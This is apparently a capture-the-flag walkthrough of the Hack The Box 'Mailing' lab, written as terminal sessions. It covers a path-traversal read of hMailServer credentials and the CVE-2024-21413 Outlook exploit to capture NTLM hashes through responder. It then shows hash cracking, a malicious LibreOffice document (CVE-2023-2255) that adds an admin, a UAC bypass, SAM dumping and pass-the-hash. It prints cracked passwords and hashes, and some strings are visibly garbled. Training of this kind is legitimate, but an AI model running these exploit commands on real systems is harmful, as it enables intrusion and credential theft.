Mailing

Recon

nmap_scan.log

Add hostname to dns:

└─$ echo '10.10.11.14 mailing.htb'  sudo tee -a /etc/hosts

HTTP (80)

Pasted_image_20240527194440.png

From instructions we know that user maya exists and default user user:password was created, probably demo and deleted. (Creds don't work for SMTP)

Get IIS Config:

curl http://mailing.htb/download.php?file=../web.config

<?xml version="1.0" encoding="UTF-8"?>
<configuration>
    <system.webServer>
        <rewrite>
            <rules>
                <rule name="HostName" stopProcessing="true">
                    <match url=".*" />
                    <conditions>
                        <add input="{HTTP_HOST}" pattern="^(?:[0-9]{1,_}\.){_}[0-9]{1,_}$" />
                    </conditions>
                    <action type="Redirect" url="http://mailing.htb" />
                </rule>
            </rules>
        </rewrite>
    </system.webServer>
</configuration>

Nothing interesting, but we have LFI.

Find config files of hMailServer:

https://www.hmailserver.com/documentation/v5.4/?page=reference_inifilesettings https://www.hmailserver.com/forum/viewtopic.php?t=14994

┌──(woyag㉿kraken)-[~/Desktop/Rooms/Mailing]
└─$ curl 'http://mailing.htb/download.php?file=../../../../../Program%20Files%20(x86)/hMailServer/Bin/hMailServer.ini' --path-as-is
[Directories]
ProgramFolder=C:\Program Files (x86)\hMailServer
DatabaseFolder=C:\Program Files (x86)\hMailServer\Database
DataFolder=C:\Program Files (x86)\hMailServer\Data
LogFolder=C:\Program Files (x86)\hMailServer\Logs
TempFolder=C:\Program Files (x86)\hMailServer\Temp
EventFolder=C:\Program Files (x86)\hMailServer\Events
[GUILanguages]
ValidLanguages=english,swedish
[Security]
AdministratorPassword=841bb5acfa6779ae432fd7a4e6600ba7
[Database]
Type=MSSQLCE
Username=
Password=0a9f8ad8bf896b501dde74f08efd7e4c
PasswordEncryption=1
Port=0
Server=
Database=hMailServer
Internal=1

┌──(woyag㉿kraken)-[~/Desktop/Rooms/Mailing]
└─$ curl 'http://mailing.htb/download.php?file=../../../../../Program%20Files%20(x86)/hMailServer/Data/hMailServer.ini' --path-as-is
File not found.                                                                                          

Pasted_image_20240527202007.png

Password: homenetworkingadministrator

Since we are only dealing with SMTP service and nothing else, I tried searching for Microsoft Outlook Remote Code Execution Vulnerability and ended up on CVE-2024-2141_. We know that OS is Windows so that's why Outlook. CVE also needs credentials and we got that too.

Setup responder:

┌──(woyag㉿kraken)-[~/Desktop/Rooms/Mailing/CVE-2024-2141_-Microsoft-Outlook-Remote-Code-Execution-Vulnerability]
└─$ sudo responder -I tun0
...
## Note: After some time after sending email
[SMB] NTLMv2-SSP Client   : 10.10.11.14
[SMB] NTLMv2-SSP Username : MAILING\maya
[SMB] NTLMv2-SSP Hash     : maya::MAILING:d4a8169e98107668:14C4AAF6E158C6FD28AECFA1FB11D2F6:01010000000000008055D20E2DA4DA0150B19C607AD6C_620000000002000800_0005_00_700_70001001E00570049004E002D005_005800_0005500_2004B005700_200_20048005A000400_400570049004E002D005_005800_0005500_2004B005700_200_20048005A002E00_0005_00_700_7002E004C004F004_0041004C000_001400_0005_00_700_7002E004C004F004_0041004C0005001400_0005_00_700_7002E004C004F004_0041004C00070008008055D20E2DA4DA0106000400020000000800_000_0000000000000000000000000200000D49_B88C2E__E_578271052F600A608CAF24E_9D76D45552CB707B69A7B1EC2_0A00100000000000000000000000000000000000090020006_00690066007_002F00_100_0002E00_100_0002E00_100_6002E00_700_4000000000000000000
[*] Skipping previously captured hash for MAILING\maya
[*] Skipping previously captured hash for MAILING\maya
[*] Skipping previously captured hash for MAILING\maya
[*] Skipping previously captured hash for MAILING\maya
[*] Skipping previously captured hash for MAILING\maya
[*] Skipping previously captured hash for MAILING\maya

Note: Port 25 didn't work because of TLS, 465 hang and 587 was successful.

┌──(woyag㉿kraken)-[~/Desktop/Rooms/Mailing/CVE-2024-2141_-Microsoft-Outlook-Remote-Code-Execution-Vulnerability]
└─$ py CVE-2024-21413.py \
        --server 10.10.11.14 \
        --port 587 \
        --username administrator@mailing.htb \
        --password homenetworkingadministrator \
        --sender administrator@mailing.htb \
        --recipient maya@mailing.htb \
        --url //10.10.16.74/uwu \
        --subject uwu

CVE-2024-21413 | Microsoft Outlook Remote Code Execution Vulnerability PoC.
Alexander Hagenah / @xaitax / ah@primepage.de

✅ Email sent successfully.

Note: URL is responder's IP (us) and as for share literally anything.

Using responder we are able to dump the hash of the user who visited the link, in this case maya.

┌──(woyag㉿kraken)-[~/Desktop/Rooms/Mailing/CVE-2024-2141_-Microsoft-Outlook-Remote-Code-Execution-Vulnerability]
└─$ echo 'maya::MAILING:...0000000' > maya.hash

┌──(woyag㉿kraken)-[~/Desktop/Rooms/Mailing/CVE-2024-2141_-Microsoft-Outlook-Remote-Code-Execution-Vulnerability]
└─$ hashcat --show maya.hash
5600  NetNTLMv2  Network Protocol

┌──(woyag㉿kraken)-[~/Desktop/Rooms/Mailing/CVE-2024-2141_-Microsoft-Outlook-Remote-Code-Execution-Vulnerability]
└─$ hashcat -m 5600 -a 0 maya.hash $rockyou
hashcat (v6.2.6) starting

MAYA::MAILING:...0000000000:m4y4ngs4ri

┌──(woyag㉿kraken)-[~/Desktop/Rooms/Mailing]
└─$ evil-winrm -i 10.10.11.14 -u maya -p m4y4ngs4ri
Evil-WinRM shell v_.5
*Evil-WinRM* PS C:\Users\maya\Documents> whoami
mailing\maya

*Evil-WinRM* PS C:\Users\maya> tree /f
Folder PATH listing
Volume serial number is 9502-BA18
C:.
| _D Objects
|Contacts
|Desktop
|_       Microsoft Edge.lnk
|_       user.txt
|Documents
|_   mail.py
|_   mail.vbs
_   |_WindowsPowerShell
_       |_Scripts
_           |_InstalledScriptInfos

User.txt

*Evil-WinRM* PS C:\Users\maya> type desktop/user.txt
6a89b3aa31790dac85a279d720a17df4

SMTP (25)

ExploitNotes: SMTPSMTP Auth

┌──(woyag㉿kraken)-[~/Desktop/Rooms/Mailing]
└─$ telnet $target 25
Trying 10.10.11.14...
Connected to 10.10.11.14.
Escape character is '^]'.
220 mailing.htb ESMTP
> EHLO x # Identify service
250-mailing.htb
250-SIZE 20480000
250-AUTH LOGIN PLAIN
250 HELP

Note: > symbol indicates client (me)!

┌──(woyag㉿kraken)-[~/Desktop/Rooms/Mailing]
└─$ openssl s_client -crlf -connect  $target:465
Connecting to 10.10.11.14
CONNECTED(0000000_)
Cant use SSL_get_servername
depth=0 C=EU, ST=EU\Spain, L=Madrid, O=Mailing Ltd, OU=MAILING, CN=mailing.htb, emailAddress=ruy@mailing.htb
...
220 mailing.htb ESMTP

/* Not relevant
MAIL FROM: ruy@mailing.htb
RCPT TO: maya@mailing.htb
DATA
*/

No useful information from raw SMTP interaction.

Privilege Escalation

*Evil-WinRM* PS C:\Users\maya\Documents> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                                  State
============================= ============================================ =======
SeChangeNotifyPrivilege       Omitir comprobaci¢n de recorrido             Enabled
SeUndockPrivilege             Quitar equipo de la estaci¢n de acoplamiento Enabled
SeIncreaseWorkingSetPrivilege Aumentar el espacio de trabajo de un proceso Enabled
SeTimeZonePrivilege           Cambiar la zona horaria                      Enabled
*Evil-WinRM* PS C:\Users\maya\Documents> whoami /groups

GROUP INFORMATION
-----------------

Group Name                                   Type             SID          Attributes
============================================ ================ ============ ==================================================
Todos                                        Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users              Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Usuarios                             Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Usuarios de escritorio remoto        Alias            S-1-5-32-555 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                         Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Usuarios autentificados         Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Esta compa¤¡a                   Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Cuenta local                    Well-known group S-1-5-113    Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Autenticaci¢n NTLM              Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Etiqueta obligatoria\Nivel obligatorio medio Label            S-1-16-8192
*Evil-WinRM* PS C:\Users\maya\Documents>

Windows Defender is active and WinPeas/PrivescCheck.ps1 got blocked, manual enumerating go...

*Evil-WinRM* PS C:\Program Files> dir

    Directory: C:\Program Files

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----         2/27/2024   5:30 PM                Common Files
d-----          3/3/2024   4:40 PM                dotnet
d-----          3/3/2024   4:32 PM                Git
d-----         4/29/2024   6:54 PM                Internet Explorer
d-----          3/4/2024   6:57 PM                LibreOffice
d-----          3/3/2024   4:06 PM                Microsoft Update Health Tools
d-----         12/7/2019  10:14 AM                ModifiableWindowsApps
d-----         2/27/2024   4:58 PM                MSBuild
d-----         2/27/2024   5:30 PM                OpenSSL-Win64
d-----         3/13/2024   4:49 PM                PackageManagement
d-----         2/27/2024   4:58 PM                Reference Assemblies
d-----         3/13/2024   4:48 PM                RUXIM
d-----         2/27/2024   4:32 PM                VMware
d-----          3/3/2024   5:13 PM                Windows Defender
d-----         4/29/2024   6:54 PM                Windows Defender Advanced Threat Protection
d-----          3/3/2024   5:13 PM                Windows Mail
d-----          3/3/2024   5:13 PM                Windows Media Player
d-----         4/29/2024   6:54 PM                Windows Multimedia Platform
d-----         2/27/2024   4:26 PM                Windows NT
d-----          3/3/2024   5:13 PM                Windows Photo Viewer
d-----         4/29/2024   6:54 PM                Windows Portable Devices
d-----         12/7/2019  10:31 AM                Windows Security
d-----         3/13/2024   4:49 PM                WindowsPowerShell

LibreOffice seems out of ordinary Windows installation, usually we have Office applications and considering Outlook was used it's a bit odd.

*Evil-WinRM* PS C:\Program Files> cd LibreOffice
*Evil-WinRM* PS C:\Program Files\LibreOffice> cmd /c "dir /s/b *.txt" | sls -NotMatch extensions

C:\Program Files\LibreOffice\license.txt
C:\Program Files\LibreOffice\help\media\icon-themes\README.txt
C:\Program Files\LibreOffice\program\python-core-3.8.12\lib\lib2to3\Grammar.txt
C:\Program Files\LibreOffice\program\python-core-3.8.12\lib\lib2to3\PatternGrammar.txt
C:\Program Files\LibreOffice\program\python-core-3.8.12\lib\site-packages\README.txt
C:\Program Files\LibreOffice\readmes\readme_en-GB.txt
C:\Program Files\LibreOffice\readmes\readme_en-US.txt
C:\Program Files\LibreOffice\readmes\readme_en-ZA.txt
C:\Program Files\LibreOffice\readmes\readme_es.txt
C:\Program Files\LibreOffice\share\gallery\personas\personas_list.txt

*Evil-WinRM* PS C:\Program Files\LibreOffice> cat 'C:\Program Files\LibreOffice\readmes\readme_en-US.txt' | select -First 10
======================================================================
LibreOffice 7.4 ReadMe
======================================================================

Installation is really old:

Before going further into random old software let's check permissions on it first using icacls:

*Evil-WinRM* PS C:\Program Files> icacls LibreOffice
LibreOffice NT SERVICE\TrustedInstaller:(I)(F)
            NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F)
            NT AUTHORITY\SYSTEM:(I)(F)
            NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
            BUILTIN\Administradores:(I)(F)
            BUILTIN\Administradores:(I)(OI)(CI)(IO)(F)
            BUILTIN\Usuarios:(I)(RX)
            BUILTIN\Usuarios:(I)(OI)(CI)(IO)(GR,GE)
            CREATOR OWNER:(I)(OI)(CI)(IO)(F)
            ENTIDAD DE PAQUETES DE APLICACIONES\TODOS LOS PAQUETES DE APLICACIONES:(I)(RX)
            ENTIDAD DE PAQUETES DE APLICACIONES\TODOS LOS PAQUETES DE APLICACIONES:(I)(OI)(CI)(IO)(GR,GE)
            ENTIDAD DE PAQUETES DE APLICACIONES\TODOS LOS PAQUETES DE APLICACIàN RESTRINGIDOS:(I)(RX)
            ENTIDAD DE PAQUETES DE APLICACIONES\TODOS LOS PAQUETES DE APLICACIàN RESTRINGIDOS:(I)(OI)(CI)(IO)(GR,GE)

Successfully processed 1 files; Failed processing 0 files

Normal users have (GR,GE) perms -> Generic Read/Generic Execute

Searching for CVEs: https://www.cvedetails.com/vulnerability-list/vendor_id-11439/product_id-21008/Libreoffice-Libreoffice.html

Vulnerability Details : CVE-2023-2255

Improper access control in editor components of The Document Foundation LibreOffice allowed an attacker to craft a document that would cause external links to be loaded without prompt. In the affected versions of LibreOffice documents that used "floating frames" linked to external files, would load the contents of those frames without prompting the user for permission to do so. This was inconsistent with the treatment of other linked content in LibreOffice. This issue affects: The Document Foundation LibreOffice 7.4 versions prior to 7.4.7; 7.5 versions prior to 7.5.3.

PoC: CVE-2023-2255

But where to put it? Going back to the root dir I saw interesting directory:

*Evil-WinRM* PS C:\Users\maya> dir /
    Directory: C:\
Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----         4/10/2024   5:32 PM                Important Documents # <--
d-----         2/28/2024   8:49 PM                inetpub
d-----         12/7/2019  10:14 AM                PerfLogs
d-----          3/9/2024   1:47 PM                PHP
d-r---         3/13/2024   4:49 PM                Program Files
d-r---         3/14/2024   3:24 PM                Program Files (x86)
d-r---          3/3/2024   4:19 PM                Users
d-----         4/29/2024   6:58 PM                Windows
d-----         4/12/2024   5:54 AM                wwwroot

┌──(woyag㉿kraken)-[~/Desktop/Rooms/Mailing]
└─$ git clone https://github.com/elweth-sec/CVE-2023-2255.git

┌──(woyag㉿kraken)-[~/Desktop/Rooms/Mailing]
└─$ cd CVE-2023-2255

┌──(woyag㉿kraken)-[~/Desktop/Rooms/Mailing/CVE-2023-2255]
└─$ py CVE-2023-2255.py --cmd 'net user naya Password123$ /add && net localgroup administrators naya /add' --output exp.odt
File exp.odt has been created !

*Evil-WinRM* PS C:\Important Documents> upload ./CVE-2023-2255/exp.odt

Info: Uploading /home/woyag/Desktop/Rooms/Mailing/CVE-2023-2255/exp.odt to C:\Important Documents\exp.odt
Data: 40760 bytes of 40760 bytes copied
Info: Upload successful!

Hmm... some kind of policy was in place (probably) and the user wasn't being created.

Also the group name was incorrect because it's not english:

*Evil-WinRM* PS C:\Important Documents> net user localadmin
User name                    localadmin
Local Group Memberships      *Administradores
Global Group memberships     *Ninguno

Recreate the payload:

┌──(woyag㉿kraken)-[~/Desktop/Rooms/Mailing/CVE-2023-2255]
└─$ py CVE-2023-2255.py --cmd 'net localgroup Administradores maya /add' --output exp2.odt
File exp2.odt has been created !

*Evil-WinRM* PS C:\Important Documents> upload ./CVE-2023-2255/exp2.odt

---
wait
--- # The file gets deleted afterwards

*Evil-WinRM* PS C:\Important Documents> net user maya
User name                    maya
Local Group Memberships      *Administradores      *Remote Management Use
                             *Usuarios             *Usuarios de escritori
Global Group memberships     *Ninguno

Method 1

Check UAC Enabled:

*Evil-WinRM* PS C:\Users\maya> reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
    ConsentPromptBehaviorAdmin    REG_DWORD    0x5
    ConsentPromptBehaviorUser    REG_DWORD    0x3
    DelayedDesktopSwitchTimeout    REG_DWORD    0x0
    DisableAutomaticRestartSignOn    REG_DWORD    0x1
    DSCAutomationHostEnabled    REG_DWORD    0x2
    EnableCursorSuppression    REG_DWORD    0x1
    EnableFullTrustStartupTasks    REG_DWORD    0x2
    EnableInstallerDetection    REG_DWORD    0x1
    EnableLUA    REG_DWORD    0x1                         # <---------------
    EnableSecureUIAPaths    REG_DWORD    0x1
    EnableUIADesktopToggle    REG_DWORD    0x0
    EnableUwpStartupTasks    REG_DWORD    0x2
    EnableVirtualization    REG_DWORD    0x1
    PromptOnSecureDesktop    REG_DWORD    0x1
    SupportFullTrustStartupTasks    REG_DWORD    0x1
    SupportUwpStartupTasks    REG_DWORD    0x1
    ValidateAdminCodeSignatures    REG_DWORD    0x0
    disablecad    REG_DWORD    0x0
    dontdisplaylastusername    REG_DWORD    0x0
    legalnoticecaption    REG_SZ
    legalnoticetext    REG_SZ
    scforceoption    REG_DWORD    0x0
    shutdownwithoutlogon    REG_DWORD    0x1
    undockwithoutlogon    REG_DWORD    0x1

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\Audit
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\UIPI

We don't have direct access to localadmin directory because UAC is in place. We can utilize RunasCs tool to bypass UAC control and execute any command as admins.

*Evil-WinRM* PS C:\Users\maya> cd $ENV:TEMP
*Evil-WinRM* PS C:\Users\maya\AppData\Local\Temp> upload rc.exe
*Evil-WinRM* PS C:\Users\maya\AppData\Local\Temp> .\rc.exe maya m4y4ngs4ri "powershell -c dir /Users/localadmin" --bypass-uac
    Directory: C:\Users\localadmin

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----        2024-03-03   4:40 PM                .dotnet
d-r---        2024-02-27   4:30 PM                3D Objects
d-r---        2024-02-27   4:30 PM                Contacts
d-r---        2024-04-12   6:10 AM                Desktop
d-r---        2024-03-14   3:39 PM                Documents
d-r---        2024-04-30   9:14 AM                Downloads
d-r---        2024-02-27   4:30 PM                Favorites
d-r---        2024-02-27   4:30 PM                Links
d-r---        2024-02-27   4:30 PM                Music
d-r---        2024-02-27   4:32 PM                OneDrive
d-r---        2024-02-27   4:32 PM                Pictures
d-r---        2024-02-27   4:30 PM                Saved Games
d-r---        2024-02-27   4:31 PM                Searches
d-r---        2024-03-05   3:37 PM                Videos

*Evil-WinRM* PS C:\Users\maya\AppData\Local\Temp> .\rc.exe maya m4y4ngs4ri "powershell -c dir /Users/localadmin/Desktop" --bypass-uac
    Directory: C:\Users\localadmin\Desktop
    
Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----        2024-02-27   4:30 PM           2350 Microsoft Edge.lnk
-ar---        2024-05-12  12:58 PM             34 root.txt

*Evil-WinRM* PS C:\Users\maya\AppData\Local\Temp> .\rc.exe maya m4y4ngs4ri "powershell -c type /Users/localadmin/Desktop/root.txt" --bypass-uac
c7fd0ef937dc6923ac5ba902c202251d

Method 2

Dump the hashes and login via hash into machine:

┌──(woyag㉿kraken)-[~/Desktop/Rooms/Mailing]
└─$ netexec smb 10.10.11.14 -u maya -p m4y4ngs4ri --sam
SMB         10.10.11.14     445    MAILING          [*] Windows 10 / Server 2019 Build 19041 x64 (name:MAILING) (domain:MAILING) (signing:False) (SMBv1:False)
SMB         10.10.11.14     445    MAILING          [+] MAILING\maya:m4y4ngs4ri (Pwn3d!)
SMB         10.10.11.14     445    MAILING          [*] Dumping SAM hashes
SMB         10.10.11.14     445    MAILING          Administrador:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         10.10.11.14     445    MAILING          Invitado:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         10.10.11.14     445    MAILING          DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         10.10.11.14     445    MAILING          WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:e349e2966c623fcb0a254e866a9a7e4c:::
SMB         10.10.11.14     445    MAILING          localadmin:1001:aad3b435b51404eeaad3b435b51404ee:9aa582783780d1546d62f2d102daefae:::
SMB         10.10.11.14     445    MAILING          maya:1002:aad3b435b51404eeaad3b435b51404ee:af760798079bf7a3d80253126d3d28af:::
SMB         10.10.11.14     445    MAILING          [+] Added 6 SAM hashes to the database

┌──(woyag㉿kraken)-[~/Desktop/Rooms/Mailing]
└─$ evil-winrm -i 10.10.11.14 -u localadmin -H 9aa582783780d1546d62f2d102daefae

Evil-WinRM shell v3.5

*Evil-WinRM* PS C:\Users\localadmin\Documents> whoami
mailing\localadmin
*Evil-WinRM* PS C:\Users\localadmin\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\localadmin\Desktop> cat root.txt
c7fd0ef937dc6923ac5ba902c202251d

---

Since we have Admin access we could probably utilize any actions from: https://www.netexec.wiki/smb-protocol/obtaining-credentials